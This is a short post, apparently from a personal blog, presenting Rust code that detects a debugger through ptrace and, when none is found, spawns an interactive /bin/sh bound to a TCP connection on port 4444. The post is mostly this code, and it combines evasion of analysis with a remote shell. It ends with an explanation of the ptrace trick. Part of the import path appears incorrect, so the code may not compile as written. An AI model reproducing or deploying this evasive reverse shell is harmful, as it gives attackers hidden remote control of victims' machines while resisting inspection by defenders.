Anti-Debug with conditional reverse-shell

[Jack Hastilow]

If you are reading this, this program is basic anti-debug in rustlang, it is able to detect whether or not it is being debugged.
If the program is detected an active tracer then it won’t execute it’s payload…If no then it will send the reverse shell.

use nix::sys::ptrace::traceme;
use std::process::exit;

fn main() {
let _res = match traceme() {
Ok(_s) => invade(),Err(_e) => evade()
};
exit(0)
}

fn evade() {
println!("......Debugger...Detected......")
}

fn invade() {
use std::net::TcpStream;
use std::process::{Command, Stdio};
use std::os::unix::{AsRawFd, FromRawFd};

println!("......Offensive...Started......");
let stream = TcpStream::connect("127.0.0.1:4444").unwrap();
let fd = stream.as_raw_fd();
Command::new("/bin/sh")
.arg("-i")
.stdin(unsafe { Stdio::from_raw_fd(fd) })
.stdout(unsafe { Stdio::from_raw_fd(fd) })
.stderr(unsafe { Stdio::from_raw_fd(fd) })
.spawn()
.unwrap()
.wait();
}

To understand how it work technically:
Linux debugger use ptrace() to trace, On Linux a process may only call ptrace() once this means if a process is already being debugged then it cannot call ptrace (it will result an Error) this makes debugger detection kinda easy show that we can just issue our own ptrace call(s), evaluate the results and decide what we can do…

I will be very happy on your reviews